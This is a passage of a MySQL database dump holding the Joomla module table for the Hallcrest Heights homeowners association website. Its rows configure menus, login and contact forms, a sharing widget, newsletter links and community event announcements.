TABLES `jos_messages_cfg` WRITE; /*!40000 ALTER TABLE `jos_messages_cfg` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_messages_cfg` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_modules` -- DROP TABLE IF EXISTS `jos_modules`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_modules` ( `id` int(11) NOT NULL AUTO_INCREMENT, `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.', `title` varchar(100) NOT NULL DEFAULT '', `note` varchar(255) NOT NULL DEFAULT '', `content` text NOT NULL, `ordering` int(11) NOT NULL DEFAULT '0', `position` varchar(50) NOT NULL DEFAULT '', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL DEFAULT '0', `module` varchar(50) DEFAULT NULL, `access` int(10) unsigned DEFAULT NULL, `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1', `params` text NOT NULL, `client_id` tinyint(4) NOT NULL DEFAULT '0', `language` char(7) NOT NULL, PRIMARY KEY (`id`), KEY `published` (`published`,`access`), KEY `newsfeeds` (`module`,`published`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=49 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_modules` -- LOCK TABLES `jos_modules` WRITE; /*!40000 ALTER TABLE `jos_modules` DISABLE KEYS */; INSERT INTO `jos_modules` VALUES (1,0,'Top Menu','','',1,'user3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,0,'{\"menutype\":\"mainmenu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(2,0,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,0,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,0,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,0,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,0,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,0,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,0,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,0,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,0,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,0,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(16,0,'Login Form','','',7,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'{\"greeting\":\"1\",\"name\":\"0\"}',0,'*'),(17,0,'Breadcrumbs','','',1,'position-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_breadcrumbs',1,1,'{\"moduleclass_sfx\":\"\",\"showHome\":\"1\",\"homeText\":\"Home\",\"showComponent\":\"1\",\"separator\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(18,0,'Book Store','','',1,'position-10',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_banners',1,0,'{\"target\":\"1\",\"count\":\"1\",\"cid\":\"3\",\"catid\":[\"\"],\"tag_search\":\"0\",\"ordering\":\"0\",\"header_text\":\"\",\"footer_text\":\"Books!\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(20,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(21,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(22,0,'Logo','','<p><img src=\"images/logo.png\" alt=\"Hallcrest Heights\" height=\"106\" width=\"200\" /></p>',1,'logo',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(23,0,'ImageSlideShow','','',1,'banner1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_briaskISS',1,0,'{\"moduleclass_sfx\":\"\",\"Directory\":\"images\\/slider\",\"pxHeight\":\"259\",\"pxWidth\":\"915\",\"transDelay\":\"50\",\"nextDelay\":\"7000\",\"Title\":\"An Image Slideshow\",\"URL\":\"http:\\/\\/www.joomla.org\",\"EnableLink\":\"0\",\"Sequence\":\"0\",\"Resize\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(24,0,'Side Menu','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,0,'{\"menutype\":\"side-menu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"art-vmenu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(25,0,'Community Features','','<table>\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"text-align: left;\">Community Features</h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Beautiful town houses</td>\r\n</tr>\r\n<tr>\r\n<td>Generous parking</td>\r\n</tr>\r\n<tr>\r\n<td>Responsible stewardship</td>\r\n</tr>\r\n<tr>\r\n<td>Grounds maintenance</td>\r\n</tr>\r\n<tr>\r\n<td>Metro stop within walking distance</td>\r\n</tr>\r\n</tbody>\r\n</table>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(26,0,'Map','','<p><img src=\"images/map.jpg\" alt=\"map\" width=\"211\" height=\"249\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></p>',3,'left',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"art-nostyle\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(27,78,'Footer Links','','<table style=\"width: 100%;\" border=\"0\" cellpadding=\"10\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\">\r\n<p style=\"text-align: left;\"><a href=\"terms-of-service.html\">Terms of Service</a> | <a href=\"privacy-policy.html\">Privacy Policy</a></p>\r\n</td>\r\n<td valign=\"top\">\r\n<p style=\"text-align: right;\">Copyright © 2017. All Rights Reserved.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\"> </td>\r\n<td valign=\"top\">\r\n<p>This web site is the only official notice from the Hallcrest Heights Association concerning news, views and concerns of the community. <br />Other web sites, facebook pages, etc. are the limited comments of individuals, real estate agents, or others who are not representing the community or are just using the Hallcrest Heights name.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>',1,'copyright',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(28,0,'Add This','','<!-- AddThis Button BEGIN -->\r\n<div class=\"addthis_toolbox addthis_default_style\">\r\n<a class=\"addthis_button_facebook_like\" fb:like:layout=\"button_count\"></a>\r\n<a class=\"addthis_button_tweet\"></a>\r\n<a class=\"addthis_button_pinterest_pinit\"></a>\r\n<a class=\"addthis_counter addthis_pill_style\"></a>\r\n</div>\r\n<script type=\"text/javascript\" src=\"//s7.addthis.com/js/300/addthis_widget.js\"></script>\r\n<!-- AddThis Button END -->',1,'addthis',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(29,0,'Add This','','',1,'addthis',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_blank30v13',1,0,'{\"codeeditor\":\"<!-- AddThis Button BEGIN -->\\r\\n<div class=\\\"addthis_toolbox addthis_default_style\\\">\\r\\n<a class=\\\"addthis_button_facebook_like\\\" fb:like:layout=\\\"button_count\\\"><\\/a>\\r\\n<a class=\\\"addthis_button_tweet\\\"><\\/a>\\r\\n<a class=\\\"addthis_button_pinterest_pinit\\\"><\\/a>\\r\\n<a class=\\\"addthis_counter addthis_pill_style\\\"><\\/a>\\r\\n<\\/div>\\r\\n<script type=\\\"text\\/javascript\\\" src=\\\"\\/\\/s7.addthis.com\\/js\\/300\\/addthis_widget.js\\\"><\\/script>\\r\\n<!-- AddThis Button END -->\",\"textareause\":\"1\",\"phpcode\":\"\",\"phpuse\":\"1\",\"script\":\"\",\"scriptuse\":\"1\",\"itemid\":\"a\",\"contenttitleuse\":\"1\",\"contentuse\":\"1\",\"content1\":\"1\",\"content2\":\"2\",\"content3\":\"3\",\"graphics\":\"2\",\"keycolour\":\"grey\",\"surroundstyle\":\"06roundcorner5\",\"bgpattern\":\"herring\",\"bgautocolour\":\"1\",\"bgcustomcolour\":\"FFFFFF\",\"trans2\":\"1\",\"colour2\":\"FFFFFF\",\"custompx\":\"20\",\"margin-leftmodule\":\"\",\"paddingleft\":\"\",\"paddingright\":\"\",\"paddingtop\":\"\",\"paddingbottom\":\"\",\"margin-top\":\"\",\"margin-bottom\":\"\",\"width\":\"100\",\"widthunit\":\"%\",\"trans1\":\"1\",\"colour1\":\"FFFFFF\",\"moduleclass_sfx\":\"\",\"modno_bm\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(30,0,'Rapid Contact','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_rapid_contact',1,1,'',0,'*'),(31,0,'Contact Us','','',2,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_simpleemailform',1,1,'{\"mod_simpleemailform_defaultLang\":\"en-GB\",\"mod_simpleemailform_emailTo\":\"richardtibang@gmail.com\",\"mod_simpleemailform_labelAlign\":\"L\",\"mod_simpleemailform_field1active\":\"R\",\"mod_simpleemailform_field1label\":\"Name\",\"mod_simpleemailform_field1value\":\"\",\"mod_simpleemailform_field1size\":\"40\",\"mod_simpleemailform_field1maxx\":\"100\",\"mod_simpleemailform_field1from\":\"N\",\"mod_simpleemailform_field1ckRfmt\":\"H\",\"mod_simpleemailform_field1ckRpos\":\"B\",\"mod_simpleemailform_field2active\":\"R\",\"mod_simpleemailform_field2label\":\"Email\",\"mod_simpleemailform_field2value\":\"Subject\",\"mod_simpleemailform_field2size\":\"40\",\"mod_simpleemailform_field2maxx\":\"255\",\"mod_simpleemailform_field2from\":\"F\",\"mod_simpleemailform_field2ckRfmt\":\"C\",\"mod_simpleemailform_field2ckRpos\":\"B\",\"mod_simpleemailform_field3active\":\"Y\",\"mod_simpleemailform_field3label\":\"Phone Number\",\"mod_simpleemailform_field3value\":\"Value 3\",\"mod_simpleemailform_field3size\":\"40\",\"mod_simpleemailform_field3maxx\":\"100\",\"mod_simpleemailform_field3from\":\"N\",\"mod_simpleemailform_field3ckRfmt\":\"C\",\"mod_simpleemailform_field3ckRpos\":\"B\",\"mod_simpleemailform_field4active\":\"Y\",\"mod_simpleemailform_field4label\":\"How did you hear about us?\",\"mod_simpleemailform_field4value\":\"Value 4\",\"mod_simpleemailform_field4size\":\"40\",\"mod_simpleemailform_field4maxx\":\"255\",\"mod_simpleemailform_field4from\":\"D\",\"mod_simpleemailform_field4ckRfmt\":\"C\",\"mod_simpleemailform_field4ckRpos\":\"B\",\"mod_simpleemailform_field5active\":\"R\",\"mod_simpleemailform_field5label\":\"Comments\",\"mod_simpleemailform_field5value\":\"Value 5\",\"mod_simpleemailform_field5size\":\"40\",\"mod_simpleemailform_field5maxx\":\"1000\",\"mod_simpleemailform_field5from\":\"A\",\"mod_simpleemailform_field5ckRfmt\":\"C\",\"mod_simpleemailform_field5ckRpos\":\"B\",\"mod_simpleemailform_field6active\":\"N\",\"mod_simpleemailform_field6label\":\"Field 6\",\"mod_simpleemailform_field6value\":\"Value 6\",\"mod_simpleemailform_field6size\":\"40\",\"mod_simpleemailform_field6maxx\":\"255\",\"mod_simpleemailform_field6from\":\"N\",\"mod_simpleemailform_field6ckRfmt\":\"C\",\"mod_simpleemailform_field6ckRpos\":\"B\",\"mod_simpleemailform_field7active\":\"N\",\"mod_simpleemailform_field7label\":\"Field 7\",\"mod_simpleemailform_field7value\":\"Value 7\",\"mod_simpleemailform_field7size\":\"40\",\"mod_simpleemailform_field7maxx\":\"255\",\"mod_simpleemailform_field7from\":\"N\",\"mod_simpleemailform_field7ckRfmt\":\"C\",\"mod_simpleemailform_field7ckRpos\":\"B\",\"mod_simpleemailform_field8active\":\"N\",\"mod_simpleemailform_field8label\":\"Field 8\",\"mod_simpleemailform_field8value\":\"Value 8\",\"mod_simpleemailform_field8size\":\"40\",\"mod_simpleemailform_field8maxx\":\"255\",\"mod_simpleemailform_field8from\":\"N\",\"mod_simpleemailform_field8ckRfmt\":\"C\",\"mod_simpleemailform_field8ckRpos\":\"B\",\"cache\":\"0\",\"mod_simpleemailform_instance\":\"1\",\"mod_simpleemailform_emailCC\":\"\",\"mod_simpleemailform_emailBCC\":\"\",\"mod_simpleemailform_emailReplyTo\":\"\",\"mod_simpleemailform_replytoActive\":\"N\",\"mod_simpleemailform_autoreset\":\"N\",\"mod_simpleemailform_cssClass\":\"mod_sef\",\"mod_simpleemailform_col2space\":\"5\",\"mod_simpleemailform_redirectURL\":\"\",\"mod_simpleemailform_useCaptcha\":\"N\",\"mod_simpleemailform_captchaDir\":\"\",\"mod_simpleemailform_captchaURL\":\"\",\"mod_simpleemailform_captchaLen\":\"8\",\"mod_simpleemailform_captchaSize\":\"24\",\"mod_simpleemailform_captchaWidth\":\"200\",\"mod_simpleemailform_captchaHeight\":\"80\",\"mod_simpleemailform_captchaTxtColor\":\"#000000\",\"mod_simpleemailform_captchaLinesColor\":\"#FFFF00\",\"mod_simpleemailform_captchaBgColor\":\"#BFBFBF\",\"mod_simpleemailform_errorTxtColor\":\"red\",\"mod_simpleemailform_successTxtColor\":\"green\",\"mod_simpleemailform_anchor\":\"#\",\"mod_simpleemailform_uploadActive\":\"0\",\"mod_simpleemailform_uploadLabel\":\"Attachment\",\"mod_simpleemailform_uploadAllowed\":\"\",\"mod_simpleemailform_emailFile\":\"\",\"mod_simpleemailform_copymeLabel\":\"Send me a copy\",\"mod_simpleemailform_copymeActive\":\"N\",\"mod_simpleemailform_copymeAuto\":\"N\",\"mod_simpleemailform_emailCheck\":\"Y\",\"mod_simpleemailform_testMode\":\"N\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(39,0,'Footer','','',1,'atomic-bottomleft',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"footer\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(40,0,'Banner Top','','<p><img alt=\"image3\" src=\"images/hh-banner.jpg\" style=\"border-radius: 10px 10px 10px 10px; display: block; margin: 10px auto 0px;\" height=\"172\" width=\"915\" /></p>',1,'banner1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(41,0,'Events Calendar','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_simplecalendar',1,1,'{\"count\":\"5\",\"fields\":\"{NAME}, {VENUE} ({START_DATE})\",\"show_link\":\"1\",\"period\":\"1\",\"date_format\":\"m\\/d\\/Y\",\"time_format\":\"H:i\",\"moduleclass_sfx\":\"\",\"catid\":[\"\"],\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(42,79,'HOA Newsletters','','<p><span style=\"text-decoration: underline;\"><a href=\"files/HH Newsletter 201704.pdf\" target=\"_blank\">April 2017</a> <a href=\"files/HH Newsletter 201704.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH Newsletter 201704.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span></p>\r\n<p><span style=\"text-decoration: underline;\"><a href=\"files/HH_Newsletter_201612.pdf\" target=\"_blank\">December 2016</a> <a href=\"files/HH_Newsletter_201612.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201612.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span> <span style=\"text-decoration: underline;\"> <a href=\"files/HH_Newsletter_201604.pdf\" target=\"_blank\">April 2016</a> <a href=\"files/HH_Newsletter_201604.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201604.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span> <span style=\"text-decoration: underline;\"> <a href=\"files/HH_Newsletter_201507.pdf\" target=\"_blank\">July 2015</a> <a href=\"files/HH_Newsletter_201507.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201507.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span> <span style=\"text-decoration: underline;\"> <a href=\"files/HH_Newsletter_201506.pdf\" target=\"_blank\">June 2015</a> <a href=\"files/HH_Newsletter_201506.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201506.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span> <span style=\"text-decoration: underline;\"> <a href=\"files/HH_Newsletter_201502.pdf\" target=\"_blank\" rel=\"alternate\">February 2015</a> <a href=\"files/HH_Newsletter_201502.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201502.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span> <span style=\"text-decoration: underline;\"> <a href=\"files/HH_Newsletter_201412.pdf\" target=\"_blank\">Nov/Dec 2014</a> <a href=\"files/HH_Newsletter_201412.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201412.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span> <span style=\"text-decoration: underline;\"> <a href=\"files/HH_Newsletter_201407.pdf\" target=\"_blank\">July 2014</a> <a href=\"files/HH_Newsletter_201407.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201407.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span> <span style=\"text-decoration: underline;\"> <a href=\"files/HH_Newsletter_201405.pdf\" target=\"_blank\">May 2014</a> <a href=\"files/HH_Newsletter_201405.pdf\" target=\"_blank\"> <img title=\"View in a new window\" src=\"images/button_magnifier2.gif\" alt=\"View in a new window\" /> </a> <a href=\"download.php?name=HH_Newsletter_201405.pdf\"> <img title=\"Download\" src=\"images/button_download2.gif\" alt=\"Download\" /> </a> <br /> </span></p>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(43,0,'Neighborhood Guide','','<p><a href=\"images/children_neighbrhd_guide_big.jpg\" rel=\"prettyPhoto\"><img src=\"images/children_neighbrhd_guide.jpg\" alt=\"Children\" /></a></p>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(44,0,'About Us','','<p>Ideas and Suggestions Wanted!<br /><br />The Hallcrest Annual Meeting is a great opportunity to share ideas you have for improvements to the community. We hope to see you there.</p>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(45,0,'Special Interest Notes','','<p><a href=\"images/hallcrest_group_big.jpg\" title=\"\" rel=\"prettyPhoto\"><img src=\"images/hallcrest_group.jpg\" alt=\"Hallcrest\" /></a></p>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(46,80,'Announcements','','<h4 style=\"text-align: left;\"><span style=\"font-size: 12pt;\">Hallcrest Community Events</span></h4>\r\n<p><strong><em>McLean WinterFest Parade</em></strong></p>\r\n<p>Sunday, December 3, 2017<br />3:30 p.m.<br />Beverly Road through Old Chain Bridge Road</p>\r\n<p><strong><em>McLean Community Center Events</em></strong></p>\r\n<p><strong>Aesop\'s Fables </strong>presented on Saturday, January 6, 2017 <br />11 a.m. at Churchill Road Elementary School<br />$15/$10 MCC district residents</p>\r\n<p> </p>\r\n<p><strong> </strong></p>\r\n<p> </p>\r\n<h4 style=\"text-align: left;\"> </h4>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(47,0,'Events','','<p><span style=\"color: #2672ec;\"><a href=\"images/firetruck_big.jpg\" title=\"\" rel=\"prettyPhoto\"><img src=\"images/firetruck.jpg\" alt=\"Firetruck\" /></a><br />Volunteer fireman Mike Paris brought McLean\'s antique fire engine to the Hallcrest Heights International Cookout<br /><br /><a href=\"images/home_tour_big.jpg\" title=\"\" rel=\"prettyPhoto\"><img src=\"images/home_tour.jpg\" alt=\"Home Tour\" /></a><br /><span style=\"color: #2672ec;\">Home Tour</span></span></p>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(48,0,'Community Announcements','','<p>Now Open <br />WALMART<br />1500 B Cornerside Blvd <br />Tysons Corner</p>',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 